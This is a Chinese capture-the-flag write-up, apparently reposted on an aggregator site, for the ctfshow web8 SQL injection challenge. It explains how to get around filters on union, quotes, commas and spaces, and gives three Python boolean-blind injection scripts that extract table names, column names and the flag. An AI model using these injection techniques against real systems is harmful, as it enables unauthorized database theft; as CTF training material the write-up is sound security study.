栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

ctfshow web8--sql注入

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

ctfshow web8--sql注入

问题描述

题目提示是一道sql注入题

打开题目,猜测注入点应该在id那里

经过测试,发现该题过滤了union关键字、单引号、逗号、空格

问题解决 

1.过滤了union关键字就不可以用联合注入了,尝试布尔盲注。

2.过滤了逗号,使用mid(username from 1 for 1)代替mid(username,1,1);

                        使用limit 1 offset 1代替limit 1,1

3.过滤了空格就是用注释来绕过。

4.过滤了单引号,我们使用ord()将待检测字符转换为ascii进行比较

下面我们来写python脚本跑一下

获取数据表名
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"#待测试字符
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"#题目地址

for n in range(0,2):#爆破前两个表
    table_name = ''
    for i in range(1, 10):#爆破数据表名的前十位(我们猜测该表名长度低于十位)
        for char in chars:#测试每一个待测字符
            params = {
            "id":
"-1orord(mid((selecttable_namefrominformation_schema.tableswheretable_schemain(database())limit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)
获取字段名
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"

for n in range(0,1):
    table_name = ''
    for i in range(1, 10):
        for char in chars:
            params = {
            "id":
"-1orord(mid((selectcolumn_namefrominformation_schema.columnswheretable_namein(0x666c6167)limit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)
获取字段值
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"

for n in range(0,1):
    table_name = ''
    for i in range(1, 50):
        for char in chars:
            params = {
            "id":
"-1orord(mid((selectflagfromflaglimit1offset"+str(n)+")from"+str(i)+"for1))in("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)

获取flag

来自ctf小菜鸡的日常分享,欢迎各位大佬留言。 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/339926.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号